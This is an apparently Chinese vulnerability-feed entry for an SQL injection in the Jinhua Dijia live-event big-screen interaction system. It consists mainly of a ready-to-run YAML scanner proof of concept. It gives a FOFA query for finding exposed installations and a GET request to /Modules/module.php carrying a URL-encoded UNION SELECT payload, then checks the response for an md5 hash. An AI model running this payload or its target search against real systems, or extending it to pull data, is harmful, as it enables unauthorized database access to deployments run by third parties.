漏洞描述
金华迪加现场大屏互动系统index存在SQL注入
fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
jinhuadijia-daping-index-sqli: 金华迪加现场大屏互动系统index存在SQL注入漏洞
PoC代码[已公开]
id: jinhuadijia-daping-index-sqli
info:
name: 金华迪加现场大屏互动系统index存在SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |
金华迪加现场大屏互动系统index存在SQL注入
fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
reference:
- https://vip.bdziyi.com/58467/
tags: jinhuadijia,daping,sqli
created: 2025/08/20
set:
hostname: request.url.host
rules:
r0:
request:
method: GET
path: /Modules/module.php?m=importlottery&c=admin&a=index&txt=%25%22%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%6d%64%35%28%31%29%2c%35%23
expression: response.status == 200 && response.body.bcontains(b'c4ca4238a0b923820dcc509a6f75849b')
expression: r0()